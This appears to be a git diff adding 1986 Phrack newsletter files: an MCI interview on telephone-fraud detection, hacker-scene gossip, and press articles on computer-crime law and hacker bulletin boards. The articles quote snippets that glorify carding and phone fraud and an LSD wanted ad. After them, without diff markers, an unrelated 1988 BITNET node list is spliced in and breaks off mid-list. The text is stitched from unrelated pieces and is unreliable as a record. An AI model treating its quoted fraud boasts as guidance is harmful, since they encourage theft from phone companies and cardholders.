+New teeth were added to the attack on telephone fraud when the U.S. Secret
+Service was assigned to augment continuing investigative efforts by the FBI and
+other law enforcement agencies.
+
+Because telephone fraud is outright theft from the company, MCI is determined
+to prevent, detect, investigate and prosecute any illicit use of its network.
+To learn more about how MCI conducts its anti-fraud campaign, MCI World talked
+with Bowens.
+
+MCI World: Is it true that MCI has systems that can detect fraudulent activity
+           while it is occurring?
+
+Bowens: Yes, our fraud systems detect abnormal usage and hacking.  The systems
+        also help us to track down offenders even when we have only the
+        authorization code he or she is abusing.  Because we can profile
+        abusers and trace phone calls, it is easier for us to prepare cases
+        for prosecution.
+
+MCI World: Abuses involving computer "hacking" to get authorization codes seem
+           to attract public attention.  But there are other types of fraud
+           equally damaging to the telecommunications industry.  Would you
+           identify some of these?
+
+Bowens: The primary form of abuse is by "hackers," who use computer programs to
+        derive customers' authorization codes.  These codes can be widely
+        disseminated via electronic bulletin boards.  Because many of these
+        boards are public, the codes fall into the hands of anyone with access
+        to the boards.  We also encounter electronic toll fraud, which involves
+        tone-generating devices that allow offenders to place fraudulent calls.
+
+MCI World: Is one type of fraudulent activity more prevalent than another?
+
+Bowens: Nationwide, fraud most frequently originates from military posts,
+        college campuses, and prisons--places where there are numbers of people
+        far from home, or who have little else to do but manipulate the
+        telephone.  This type of abuse prompts the bulk of our investigations.
+
+MCI World: Who is most likely to commit fraud?  Is there a general profile of
+           the common offender?
+
+Bowens: Computer crime typically occurs in affluent, metropolitan suburbs
+        and involves juveniles.  Electronic fraud also occurs in major
+        metropolitan areas.  Other abusers, such as high-pressure
+        tele-marketeers, usually follow the coast lines.  California and
+        Florida, for "boiler room" operations in which phone service is used
+        illegally to sell merchandise.  However, fraud can't be totally
+        attributed to any specific group at any particular time.
+
+MCI World: How can you keep up with code abuse and fraud?  Don't offenders
+           change frequently?
+
+Bowens: Interestingly enough, the patterns don't change much.  Those who commit
+        fraud form a finite community that doesn't expand a great a great deal
+        over time.  Casual offenders, individuals who may take advantage of a
+        "hot" toll free number, will use the number only when it's hot.  Once
+        the number no longer works, they're not likely to repeat the offense.
+        On the other hand, repeat offenders are dedicated to getting something
+        for nothing.  They're somewhat easier to identify because they commit
+        the same offense over and over.
+
+MCI World: How does MCI know when it is the target of fraudulent activity?
+
+Bowens: Our systems generally alert us, or an employee or a customer informs
+        us.  People know the MCI name.  When they recognize something happening
+        illegally with an authorization code, they'll get in touch with us.
+        People generally feel that a cheat is a cheat, a crook is a crook, and
+        if they have to pay full value for a phone call they see no reason why
+        someone else shouldn't.  There also are professional tipsters who go
+        from one company to another offering information for a price.  However,
+        we rarely deal with them.
+
+MCI World: Which MCI people, by the nature of their jobs, are most likely to
+           detect or at least suspect, fraudulent activity?
+
+Bowens: Our switch technicians have been very instrumental in detecting abuse.
+        They're in a position to identify extensive busy signals on circuits,
+        abnormal calling patterns, and code use.  They've identified many
+        hackers just by reviewing their daily call statistics. Employees in our
+        billing department are also good at spotting unusually large bills and
+        abnormal patterns.  Though most fraud is detected by the systems we
+        have in place, the human eye continues to be extremely helpful.
+
+MCI World: In addition to working with internal people to help detect
+           fraudulent activity, you also rely on the expertise of external
+           agencies.  Which outside agencies assist you with investigations.
+
+Bowens: When fraudulent activity involves the theft or illicit use of
+        authorization codes or credit calling cards, MCI and the Secret Service
+        work together to investigate the case.  If other activity is involved,
+        such as the use of our service in furtherance of other crime, MCI works
+        with the FBI.  When the U.S. Postal Service is manipulated in a fraud
+        case, MCI and postal inspectors investigate together.  Additionally,
+        Bell Operating Companies (BOCs) often provide hard evidence in cases
+        that MCI prosecutes.
+
+MCI World: When you are alerted to suspected fraudulent activity, what steps do
+           you take to open and pursue the case?
+
+Bowens: Security investigators contact the customer whose code is being abused,
+        advise them of MCI's suspicions, and attempt to confirm them.  If the
+        response confirms their suspicion of fraud, they open the case.
+        Normally, an investigation entails much research into toll records to
+        identify abusers, unusual call patterns and the parties who might be
+        involved in illicit activity.  We also interview parties receiving the
+        calls and document their statements.  Once we collect sufficient
+        evidence, we decide whether a case should be pursued as a criminal or
+        civil action.
+
+MCI World: How long does it normally take MCI's investigators to "crack" a
+           case?
+
+Bowens: Typically, investigators can crack a case within hours.  Identifying
+        fraud suspects is the easy part.  Amassing the evidence--dotting all
+        of the legal i's and crossing the t's--is tougher.  Gathering evidence
+        may take weeks and large cases involving many parties can take months
+        to solve.
+
+MCI World: With fraudulent activity knowing no geographical restrictions, how
+           do you segment the problem divisionally?
+
+Bowens: The security investigations department acts primarily in an advisory
+        capacity, helping investigators in the divisions with procedural
+        matters.  The divisions generally take responsibility for investigating
+        fraudulent activity within their jurisdictions and corporate
+        investigators pursue cases that are large in scope or require specific
+        expertise.  Corporate also takes on cases involving offenders operating
+        in more than one division.
+
+MCI World: Can you elaborate on MCI's goals for reducing the level of
+           fraudulent activity?
+
+Bowens: We want to reduce fraud to the lowest possible level.  One of MCI's
+        goals is to cut fraud by more than half in 1986.  We want to be the
+        industry leader in curbing this illegal activity.
+_______________________________________________________________________________
+
+Broadway Hacker Turned Fed Informant?                              June 2, 1986
+-------------------------------------
+Broadway Hacker recently called Phreakers Quest and left feedback to the
+sysop of that system (Shawn) saying, "I do believe that some of this
+information here is illegal."  Shawn called Dark Creeper and reported this to
+him who then later told it to me.
+
+Sometime later, Broadway Hacker called Knight Bandit to voice validate him for
+The Radio Station.  He claimed he was some sort of fed and that KB would be
+hearing from someone in Bell Security.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+The Radio Station is down because Broadway Hacker has sold his computer, his
+disks, and everything else and is moving to his new job at an unknown
+destination.  When I spoke with him, he went on that he sold his user log, but
+would not comment on that any further.  He wanted me to print that he was a fed
+and that all of his former users would soon be receiving visits from the FBI.
+This is exactly what he told Phantom Phreaker and several others which started
+a mass riot in the phreak world.  One result was the takedown of Alliance for
+fear of its safety.  It since has been put back up.
+
+Broadway justified his actions by saying that by telling rodents he was a fed,
+it would keep them off his board.  Later he said that since he is leaving the
+phreak world and no one knows where he is going, "To hell with the phreak
+world, let it fall apart and die for all I care."  So this fed scare is an
+attempt to do just that.  Was it a joke?  Did he mean that really?  I don't
+know.  Maybe he did mean it then but now has changed his mind...
+
+No one should be worried about this, everything is ok, and Broadway is not
+working with the FBI.  He now claims that he needed his line free for business
+calls and all of the above were attempts to get people not to be calling him as
+he didn't have the time or patience.  Use your own judgement.
+
+Broadway Hacker still has his Vic 20 and an old modem and is attempting to get
+back on boards.  He has also stated that the Radio Station BBS will be put back
+up at the end of the summer.  Where it will be run from is unknown although,
+Broadway speculated that when it returns it would be run off of an Amiga.
+
+                            Information Provided by
+          Broadway Hacker/Dark Creeper/Knight Bandit/Phantom Phreaker
+_______________________________________________________________________________
diff --git a/phrack6/12.txt b/phrack6/12.txt
new file mode 100644
index 0000000..988fc9c
--- /dev/null
+++ b/phrack6/12.txt
@@ -0,0 +1,2790 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Six, Phile 12 of 13
+
+:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
+
+                         *-=+^ Phrack World News ^+=-*
+
+                               Issue Five/Part 4
+
+                            Compiled and Written By
+
+                               Knight Lightning
+
+:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
+
+Grown-Up Laws Sought For Computer Criminals
+-------------------------------------------
+By Dave Skidmore (Associated Press)
+
+WASHINGTON-Teen-age computer hackers are giving way to a new generation of
+people who steal information from computers for profit rather than fun, the
+head of a House crime panel said Wednesday.
+
+"The hackers were the first generation we saw.  Now we have a lot of
+professionals who are getting into the business of accessing computer data
+bases," said Rep. William J. Hughes, D-N.J. [609/645-7957 or 202/225-6572], the
+sponsor of legislation aimed at helping law enforcement authorities better cope
+with the problem.
+
+Hughes commented as the House subcommittee on crime, which he heads, studied
+the proposed Computer Fraud and Abuse Act.
+
+Teen-age computer hobbyists, motivated fun and desire for status among fellow
+hobbyists, use home computers and the telephone to "hack" into government and
+industry data bases.
+
+Now, Hughes said, hackers' techniques are being increasingly used by
+industrial spies who sell trade secrets gleaned from corporate computers and
+thieves who change bank records to steal millions of dollars.
+
+"Computer crime is probably one of the fastest growing areas of crime. (It's)
+going to make the old robbery and burglary a little passe with certain
+professionals," he said.
+
+Hughes' bill, cosponsored by Reps. Bill McCollum, R-Fla [202/225-2176], and
+Bill Nelson, D-Fla [202/225-3671], creates three new offenses.
+
+1. It forbids unauthorized access to a computer and drops a requirement that
+   the government prove information in the computer was used or altered.
+
+2. It outlaws "pirate bulletin boards" used by hackers to trade secret computer
+   codes and passwords.
+
+3. It makes it a felony punishable by up to five years in prison and a $250,000
+   fine to maliciously cause damage in excess of $1,000 to a computer program
+   or data base.
+
+That section of the bill would apply to so-called "Trojan Horse" programs
+which, when achieving access to another computer, destroy all the data and
+programs in that computer.
+
+The legislation is intended to plug loopholes in anti-crime legislation
+passed by Congress in 1984, Hughes said.  It applies to computers used by the
+federal government or its contractors and bank and loan association computers.
+
+Hughes said he expected his bill and similar legislations sponsored by Sen.
+Paul S. Trible Jr., R-Va [804/771-2221 or 202/224-4024], to reach the House
+and Senate floors sometime in May.
+
+                    Information Provided by Blue Buccaneer
+-------------------------------------------------------------------------------
+The following is a critical breakdown of the above article.
+-------------------------------------------------------------------------------
+Blue Buccaneer:
+
+Concerning this law: I always thought it would be more fun to hack for cash,
+but hey...  Anyway, the three new offenses are what I am not to fond of:
+
+1) "forbids unauthorized access to a computer" (Gosh, really?)  "and drops a
+    requirement that the government prove information in a computer was used or
+    altered"  Now what kinda law is that?!  The government can just arrest
+    someone and not have to prove anything?  COME ON!
+
+2) "It outlaws 'pirate BBSes'"  When will these people learn the correct
+   terminology?  Pirates trade warezzzz, not 'secret passwords and codes'.  The
+   point is, that because this is a federal law, it will apply to all states.
+   We aren't talking pussy-laws anymore.  Wouldn't it be damn awful if just
+   running the stupid BBS was a crime?  Besides that, I thought we had a right
+   to freedom of the press.  Again, COME ON!
+
+3) "and a $250,000 fine to maliciously cause damage in excess of $1000 to a
+   computer program or data base".  Excuse me for asking, but can one
+   "maliciously" destroy data?  And isn't a quarter of a million dollars a bit
+   much for a teen-ager on a regular allowance?  And that much for $1000
+   damage?  Shit, I wish my insurance company paid like that when I wreck my
+   car.  Once again, COME ON!
+
+And then, I guess this is the journalist's fault, but what the hell does that
+paragraph on Trojan Horses have to do with this shit?  I mean really!  Do you
+think Joe Blow in the street is going to go: "Whew, for a minute there I was
+afraid that new bill might just skip over those Trojan Horse things."  I'd
+kinda assume Trojan Horses were covered under the "maliciously" destroying
+data rule.
+                        Above written by Blue Buccaneer
+_______________________________________________________________________________
+
+Computer Kids, Or Criminals?
+----------------------------
+Mr. Slippery, age 12, never thought playing on his home computer amounted to
+much more than harmless fun -- until a mysterious call from a stranger one day
+proved otherwise.  "I got a funny phone call from someone offering me money to
+destroy a bank's records," said Slippery, identified by his hacker alias.  "At
+that point in time, I realized that that's an incredible way to launder money.
+That if I was real smart, I would move out of the whole thing, because that was
+an obvious point at organized crime, to me."
+
+Hacking, or using a personal computer to trespass by phone lines into the
+private computer systems of corporations, foundations, universities and banks,
+is a new form of organized crime, say experts.  In the last year or two, a new,
+sophisticated breed of hacker has emerged.  Their ages vary, from the early
+hackers who started at 14, and have now entered college, to adults who operate
+computerized crime networks, but their motives are similar:  criminal.
+
+When Mr. Slippery started hacking seven years ago he as an exception among
+pimply faced, curious kids whose computers were toys for cheap, and typically
+harmless, thrills.  For four years, he lived up to his alias, eventually
+penetrating top security government computers at the Department of Defense
+(DOD) and the National Security Agency (NSA).  Mr. Slippery remained undetected
+until his last several weeks as a hacker.  He was never caught, never
+convicted.  Toward the end, he realized government security agents were
+following him and decided to put away his phone modem for good.
+
+"After about four years of this, though, I started realizing that an entirely
+new crowd had sprung up," observes Mr. Slippery, now a 19-year-old ex-hacker.
+"You now have the 14 year olds who were running around destroying things seeing
+how much trouble they could cause."  Computer crime experts say the hacker
+problem is getting worse, even though industries are increasingly reluctant to
+discuss the topic.  "The malicious hacker problem is continuing to increase
+drastically and is getting far more serious," said Donn B. Parker, author of
+Fighting Computer Crime and a computer and data security consultant at SRI
+International, a California-based, non-profit research institute.
+
+"The lowering costs of equipment, the attraction of it for new kids coming into
+it as a rite of passage, points to increasing vulnerability of American
+business to the hacker problem."  Parker's expertise got him hired as a
+technical consultant to the movie War Games about two teen-age hackers who
+penetrate government defense computers.  Where there is evidence of serious
+computer hacker crime is on electronic bulletin board systems (BBSes), where
+hackers share gathered intelligence.  "Phone companies have huge investments
+in their equipment that is highly vulnerable to the hackers, who have figured
+out how to beat them, and have used pirate boards for their intelligence
+purposes," said SRI International's Parker.
+
+"A large proportion of these kids are, in fact, juvenile delinquents with other
+arrest records."  Recently, a hacker posted this on a local BBS:
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+I live in Cleveland and the Pheds are fucking everywhere.  This guy who goes by
+the alias Lou Zer got caught and they told him if he narced on like 5 people he
+would get off with probation so he did that.  Now like half the 2300 club has
+been busted and this kid has a lot of problems in the future.  Also I have seen
+cops that I know of dressed as fucking federal express guys.  Try and avoid
+using them.  Also, here's some PBXs to fuck with.  They belong to Standard Oil.
+
+                                             --Later, Sir Gallahad
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Other BBSs post lists of telephone numbers of Fortune 1000 corporations, banks,
+credit bureaus, universities, and foundations.
+
+Admittedly, many of the numbers are invalid, say experts.  Though there are
+BBSes that admit members only by invitation and operate as part of a computer
+underground, others can be accessed by anyone with a computer and a phone
+modem.  Often the boards carry foreboding names like The Sanctuary, Future
+World, Dark Side, Deathtrap and Speed Demon Elite.  Computer crime is sometimes
+called the perfect crime.  Its perpetrators are anonymous hackers using aliases
+like Phantom Phreaker, Big Brother, Bootleg, Sigmund Fraud, and Scan Man.
+
+John Maxfield is a computer security consultant who lives in a downriver
+suburb.  Maxfield spends most of his working hours scanning BBSs, and is known
+by computer crime experts as a hacker tracker.  His investigative work scanning
+boards has resulted in more prosecutions of computer hackers than anyone else
+in the field, say sources familiar with his work.  Maxfield, who accepts death
+threats and other scare tactics as part of the job, says the trick is knowing
+the enemy.  Next to his monstrous, homemade computer system, Maxfield boasts
+the only file on computer hackers that exists.  It contains several thousand
+aliases used by hackers, many followed by their real names and home phone
+numbers.  All of it is the result of four years of steady hacker-tracking, says
+Maxfield. "I've achieved what most hackers would dearly love to achieve," said
+Maxfield.  "Hacking the hacker is the ultimate hack."
+
+Maxfield estimates there are currently 50,000 hackers operating in the computer
+underground and close to 1,000 underground bulletin boards.  Of these, he
+estimates about 200 bulletin boards are "nasty," posting credit card numbers,
+phone numbers of Fortune 500 corporations, regional phone companies, banks, and
+even authored tutorials on how to make bombs and explosives.  One growing camp
+of serious hackers is college students, who typically started hacking at 14 and
+are now into drug trafficking, mainly LSD and cocaine, said Maxfield.  This is
+an example of a recent BBS posting:
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+WANTED: LSD, of any kind.  Leave me mail if you're willing to talk prices, I'll
+take anything up to $5 a hit.  $3 is more likely.
+
+                                                  --urlord
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+The BBSs are versatile teaching tools, too.  Hackers post detailed tutorials
+on:
+
+HACKING: Using a personal computer and modem to trespass into the private
+         computer systems of corporations, foundations, universities, and
+         banks.
+
+CARDING: Using valid credit card numbers obtained from discarded carbons,
+         accounts posted at video rental stores, or even by hacking credit
+         bureau computers.
+
+TRASHING: Sifting through trash to find discarded credit card carbons,
+          receipts, computer passwords, code words, confidential phone company
+          directories.
+
+PHREAKING or FONING: Manipulating phone systems, usually to make
+                     long-distance calls at no charge.
+-------------------------------------------------------------------------------
+Below is an excerpt from a four-part tutorial on credit card fraud posted on an
+exclusive East Coast BBS for elite advanced hackers:
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Carding! By Music Major.  Believe it or not, without carding, a damper would be
+put on the computer users of America (and especially Canada).  Can you imagine
+trying to save enough money to BUY a 2400 baud modem and a 30 meg drive for a
+BBS?  Oh, of course it can be done, but considering that a majority of the
+active computer users are still in school, and most do not have a steady job,
+it will take too long, and cost too much for this average person to spend on a
+BBS.  Working at minimum wage at a part-time job, it would take 30 weeks of
+CONSTANT saving to put up the BBS (with good modem and good drive).  Not a
+pretty thought! When the going gets tough, the tough go carding!
+
+Music Major goes into more detail on later, he warns younger hackers about the
+possible risks of trying a method he claims he invented:  "I have called this
+method foning for cards.  To be convincing, you MUST have a fluent tongue and a
+semi-deep voice (skip this part if your voice is still cracking--refer back
+when you get a real voice)."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Maxfield's operation is called BoardScan.  He is paid by major corporations and
+institutions to gather and provide them with pertinent intelligence about the
+computer underground.  Maxfield also relies on reformed hackers.  Letters of
+thanks from VISA and McDonald's decorate a wall in his office along with an
+autographed photo of Scottie, the engineer on Star Trek's Starship Enterprise.
+
+Often he contacts potential clients about business.  "More often I call them
+and say, I've detected a hacker in your system," said Maxfield.  "At that
+point, they're firmly entrenched.  Once the hackers get into your computer,
+you're in trouble.  It's analogous to having roaches or mice in the walls of
+your house.  They don't make their presence known at first.  But one day you
+open the refrigerator door and a handful of roaches drop out."
+
+Prior to tracking hackers, Maxfield worked for 20-odd years in the hardware end
+of the business, installing and repairing computers and phone systems.  When
+the FBI recruited him a few years back to work undercover as a hacker and phone
+phreak, Maxfield concluded fighting hacker crime must be his mission in life.
+
+"So I became the hacker I was always afraid I would become," he said.  Maxfield
+believes the hacker problem is growing more serious.  He estimates there were
+just 400 to 500 hackers in 1982.  Every two years, he says, the numbers
+increase by a factor of 10.  Another worrisome trend to emerge recently is the
+presence of adult computer hackers.  Some adults in the computer underground
+pose as Fagans, a character from a Charles Dickens novel who ran a crime ring
+of young boys, luring young hackers to their underground crime rings.
+
+                   Courtesy of Galaxy Girl and Silicon Thief
+                       Major Editing by Knight Lightning
+          Written by Lisa Olson (News Staff Writer for Detroit News)
+-------------------------------------------------------------------------------
+A few notes:  It is my assumption that Music Major's Carding Tutorial was
+from KL       actually four posts made on the Carding Subboard on Stronghold
+-------       East.  If this is true then it would mean that at the time or
+              previous to the time of this article Maxfield was on SE.  This
+              post was probably taken in before the MASSIVE user purge on
+              Stronghold East.
+_______________________________________________________________________________
+
+
+
+=========================================================================
+
+                         CONNECTED NODES AS OF 10/05/88
+                               TOTAL NODES = 2491
+
+
+Node      Site                                      System
+--------  ----------------------------------------  ---------------------------
+DOCCRC                                              OS CP6
+UNCACDC
+UNCAMULT
+EWC                                                 VMS
+DKATS11   Aarhus Tek Skole (ATS)                    IBM VM/SP R4
+DKJAU11   Aarhus Tekniske Skole, Denmark            IBM VM/SP R4
+DKAAUCHE  Aarhus Univ                               VMS
+ACUVAX    Abilene Christian Univ                    VMS
+FINABO    Abo Akademi                               DEC VMS 4 3
+ACADIA    Acadia U                                  NOS
+IMIAGIP1  AGIP S p.A.                               IBM MVS/XA V 2 1.5
+ALBION    Albion College                            VMS
+ALCANKTN  Alcan Int Ltd KRDC                        VMS
+FINALKO   Alko Research Lab , Finland               IBM MVS/XA
+ALLEGVM   Allegheny Col                             VM/SP
+EB0UAB51  Altes Energies-U A. Barcelona             DEC VMS
+APSEDOFF  American Physical Soc                     UNIX BSD
+AUVM      American University                       VM/SP HPO
+AUVM2     American University                       VM/SP
+AMHERST   Amherst College Acad Comp Ctr             VMS
+TRANAVM1  Anadolu Univ                              VM/SP R 5
+TRANAVM2  Anadolu University, Eskisehir             IBM VM/SP R5
+ANNENRES  Annenberg Res Instit                      UNIX
+APPSTATE  Appalachian State U                       VMS
+ANLCMT    Argonne Chemical Tech Div                 VMS
+ANLCHM    Argonne Chemistry Division                VMS
+ANLHEP    Argonne High Energy Physics Div           VMS
+ANLMST    Argonne Materials Sci and Tech            VMS
+ANLNBI    Argonne Nat Lab Admin NBI                 UNIX BSD
+ANLADM1   Argonne Nat Lab Admin NBI 1               OASYS
+ANLADM2   Argonne Nat Lab Admin NBI 2               OASYS
+ANLEES1   Argonne Nat Lab EES NBI                   OASYS
+ANLNBI2   Argonne Nat Lab EES NBI                   UNIX BSD
+ANLEES2   Argonne Nat Lab EES NBI                   OASYS
+ANLEES3   Argonne Nat Lab EES NBI                   OASYS
+ANLEL     Argonne Nat Lab Elec Div                  VMS
+ANLEES    Argonne Nat Lab Ener & Environ            VMS
+ANLNESC   Argonne National Energy Sfw Ctr           VM/SP
+ANLOS     Argonne National Lab                      MVS/SP
+ANLVM     Argonne National Lab                      VM/SP
+ANLVMS    Argonne National Lab                      VMS
+ANLCV1    Argonne National Lab Cluster VAX          VMS
+ANLEMC    Argonne National Lab Electron Mic Ctr     VMS
+ANLVG     Argonne National Lab VAX Gateway          VMS
+ANLPHY    Argonne Physics Division                  VMS
+ANLPNS    Argonne Pulsed Neutron Src Proj           VMS
+ASUIC     Arizona St U Info Ctr                     VM/SP
+ASUCP1    Arizona State - U Chem/Phys/Solid State ScVMS
+ASUACAD   Arizona State U                           VM/SP
+ASUERC    Arizona State U Eng Comp Ctr              VM/HPO
+ASUCP2    Arizona State U Lib Arts & Sci Res Cmpt FaVMS
+ASUACVAX  Arizona State Univ Acad VAX               VMS
+FRIHAP31  Assistance Publique                       IBM MVS/SP
+ACMVM     Assoc Computing Machinery                 VM/SP
+AUDUCVAX  Auburn Univ                               VMS
+AEARN     Austria EARN                              VM/SP
+BABSON    Babson Coll                               VMS
+BSUVAX1   Ball State Univ                           VMS
+BARILAN   Bar Ilan U Comp Ctr                       IBM MVS/SP 1 3.5
+BARILVM   Bar Ilan Univ CC                          IBM VM/SP R4
+BIMACS    Bar llan Univ Math & CS                   UNIX BSD 4 2
+BAYLOR    Baylor Univ                               VMS
+BAYLRHSB  Baylor Univ HSB                           VM/IS
+BCIT      BCIT Computer Resources                   VM/HPO
+BCSC02    BCSC                                      VM/SP HPO 4 2
+NOBIVM    Bedrifts Instit                           VM/SP HPO R5
+BEARN     Belgium EARN                              VM/SP
+BGUNOS    Ben Gurion U Comp Ctr                     CDC NOS 2 3
+BGUVMS    Ben Gurion University                     DEC VMS 4 5
+BGUVM     Ben Gurion University                     IBM VM
+BENGUS    Ben-Gurion U Math Comp Sci                UNIX BSD 4 3
+BENTLEY   Bentley College                           PRIMOS
+CBEBDA3T  Berne University                          IBM MVS/SP
+CBEBDA3C  Berne University                          IBM MVS/SP
+BGUEE     BGU Electrical Eng.                       DEC VMS 3 7
+TRBILUN   Bilkent University, Ankara                AOS/VS V 7.57
+TECHMAX   Biomed Engineering Technion               DEC VMS
+BRCVAX    Biotech Res Ctr                           VMS
+BITNIC    BITNET NIC                                VM/SP
+INTERBIT  BITNET-Internet Gateway                   VM/SP/HPO
+BITNETDC  BITNIC Demo                               VM/SP
+BNR       BNR Information Systems                   VM/SP
+TRBOUN    Bogazici Univ                             NOS
+BCCHEM    Boston College Chem Dept                  VMS
+BCVAX3    Boston College Computer Center            VMS
+BCVMCMS   Boston College Computer Center            VM/HPO
+BCVMS     Boston College Computer Center            VMS
+BCVAX1    Boston College Computer Center            VMS
+BCVAX2    Boston College Computer Center            VMS
+BCVAX4    Boston College Computer Center            VMS
+BOSTONU   Boston U Acad Comp Ctr                    VM/SP HPO
+BUACCA    Boston U Acad Comp Ctr                    VM/SP HPO
+BUISA     Boston U Admin Ctr                        MVS/XA
+BUASTA    Boston U Astronomy VAX A                  VMS
+BUCHMB    Boston U Chem Dept VAX B                  VMS
+BUCHMC    Boston U Chem Dept VAX C                  VMS
+BUCHMA    Boston U Chemistry VAX A                  VMS
+BUENGA    Boston U Engineering VAX A                VMS
+BUMETA    Boston U Met Coll VAX A                   VM
+BUPHYA    Boston U Physics VAX A                    VMS
+BOSTCIML  Boston Univ CIML                          VM/SP
+BUMFGA    Boston Univ MFG ENG A                     VM/SP
+BUPHYC    Boston Univ Physics VAX C                 VMS
+BOWDOIN   Bowdoin College                           VMS
+BGSUSTAT  Bowling Green State Univ                  VM/SP
+BGSUOPIE  Bowling Green State Univ                  VMS
+BRANDLOG  Brandeis Univ Administration (LOGOS)      VMS
+BRANDEIS  Brandeis Univ Feldberg Comp Ctr BINAH     VMS
+BYULAW    Brigham Young U Law Sch                   VMS
+BYUSTAT1  Brigham Young Univ                        VMS
+BYUADAM   Brigham Young Univ                        UNIX
+BYUSTAT2  Brigham Young Univ                        VMS
+BYUSTAT3  Brigham Young Univ                        VMS
+BNLDAG    Brookhaven Nat Lab                        VMS
+BNL       Brookhaven National Lab                   UNIX BSD
+BNLVMA    Brookhaven National Lab                   VM/SP
+BNLCHM    Brookhaven National Lab                   VMS
+BNLCL1    Brookhaven National Lab                   VMS
+BNLUX0    Brookhaven National Lab                   ULTRIX
+BROWNCOG  Brown U Cognitive Sci                     VMS
+BROWNVM   Brown U Comp Ctr                          VM/SP
+BROWNCS   Brown U Computer Science Dept             UNIX
+BROWNHEP  Brown U Physics                           VMS
+BRYNMAWR  Bryn Mawr College                         VMS
+IDBSU     BSU                                       VM/SP
+BUCKNELL  Bucknell U Comp Services                  CP6
+BKNLVMS   Bucknell U Comp Services                  VMS
+BYUCOAL   BYU Combust Lab VAX                       VMS
+BYUETIBM  BYU Eng College                           VM/SP
+BYUADMIN  BYU ISS                                   VM/SP
+BYUVAX    BYU ISS VAX                               VMS
+BYULIB    BYU Library                               VM/SP
+IPVCCN    C.C.N. Pavia, Italy                       IBM VM/SP R5
+FRCCSC21  C.C.S.C, Strasbourg                       MVS
+FRCCSC13  C.C.S.C, Strasbourg, France               IBM VM/SP5
+FRCCSC12  C.C.S.C, Strasbourg, France               IBM VM/XA SF2
+FRCICB71  C.I.C.B. Rennes                           BULL MULTICS
+FRCICB81  C.I.C.B., Rennes, France                  CDC/NOS/VE
+FRCIME51  C.I.M.E., Grenoble, France                DEC VMS
+FRCIIL71  C.I.R.I.L., Nancy, France                 BULL MULTICS
+ICSCRAI   C.R.A.I., Rende, Italy                    IBM MVS/SP 3 8
+IPACRES   C.R.E.S. - Palermo, Italy                 DEC VMS
+INAMVSXA  C.R.I.A.I. Napoli - Italy                 IBM MVS/XA
+INACRIAI  C.R.I.A.I. Napoli - Italy                 IBM VM/SP
+FRIHBO11  C.R.I.H.                                  VM/SP
+FRIHMA21  C.R.I.H. de Marseille, France             IBM MVS
+IBACSATA  C.S.A.T.A. - Bari, Italy                  IBM VM/SP R3 1
+FRCTN11   C.T.N.                                    IBM VM
+IMIUCCA   Calcolo Autom Milano, Italy               UNIX 4 3
+CALPOLY   Calif Poly State Univ                     VM/SP
+CALSTATE  Calif State U                             NOS
+CALTECH   Caltech                                   VMS
+CITXRAY   Caltech                                   VMS
+CIT4381   Caltech                                   VM/SP
+CITDEIMO  Caltech Astronomy DEIMOS
+CITPHOBO  Caltech Astronomy PHOBOS                  VMS
+CITJULIE  Caltech CCO                               VMS
+CITROMEO  Caltech CCO                               VMS
+CITIAGO   Caltech CCO IAGO                          VMS
+HAMLET    Caltech C3P/CCO                           VMS
+CITHEX    Caltech HEP                               VMS
+CITCHEM   Caltech XHMEIA                            VMS
+CANISIUS  Canisius College CC                       VMS
+CARLETON  Carleton U                                CP-6
+CMASV1    Carnegie Mellon U Comp Srvs               VMS
+DRYCAS    Carnegie Mellon Univ Comp Clb             VMS
+CMUCCVMA  Carnegie-Mellon U Comp Ctr                VM/SP
+CWRU      Case Western                              VMS
+CUA       Catholic Univ of America CC               VMS
+CUAVAXB   Catholic Univ of America CC               VMS
+CUAVAXA   Catholic Univ of America CC               VMS
+CATCC     Catonsville Comm Coll                     VM/SP
+FRMRS11   CCSJ, Marseille, France                   IBM VM/SP
+FRCCUB11  CCUB                                      IBM VM/SP5
+FRCCUP51  CCUP, Marseille, France                   DEC VMS
+CDCCENTR  CDC Demo Ctr                              NOS
+CEBAFVAX  CEBAF Computer Center                     VMS
+FRSAC12   CEN-SACLAY DPhPE, Gif/Yvette              IBM VM/SP
+BIBLIO31  Centennial College                        VM/SP
+CENCOL    Centennial College                        VM/SP 4
+CFR       Central Florida Reg Data Ctr MVS          MVS/SP
+CFRVM     Central Florida Reg Data Ctr VM           VM/SP
+CMUVM     Central Michigan Univ                     VM/HPO 4.2
+FRAIX11   Centre de Calcul Aix-Marseille            IBM VM/CMS
+FRBDX11   Centre IC Bordeaux                        VM/SP
+FRSAC11   Centre Scientifique CEA Saclay            IBM VM/SP
+FRPOI11   Centre Scientifique IBM Paris             IBM VM/SP
+EMDCSIC1  Centro de Calculo                         NOS 2-5-3
+IPGCUIC   Centro U Itialia Centrale                 IBM VM/SP R3 1
+LUXCEP11  CEPS, Walferdange                         VM/SP
+FRTLS12   CERFACS                                   VM/SP
+CERNADP   CERN                                      IBM VM/SP
+CEARN     CERN                                      VM/SP
+CERNVAX   CERN                                      UNIX BSD
+CERNVM    CERN                                      IBM VM/SP HPO R4 2
+GEN       CERN                                      IBM MVS/SP 1 3.3
+CRVXP173  CERN P173 Exp                             VMS
+CRUXNMC   CERN P173 Experiment                      DEC VMS
+CRUXNMCE  CERN P173, Geneva, Switzerland            DEC VMS
+CRUXNMCD  CERN P173, Geneva, Switzerland            DEC VMS
+CRUXNHD   CERN P173, Geneva, Switzerland            DEC VMS
+CRUXHYPM  CERN P173, Geneva, Switzerland            DEC VMS
+CRUXNMC1  CERN P173, Geneva, Switzerland            DEC VMS
+CRUXNMC2  CERN P173, Geneva, Switzerland            DEC VMS
+CRUXHYPD  CERN P173, Geneva, Switzerland            DEC VMS
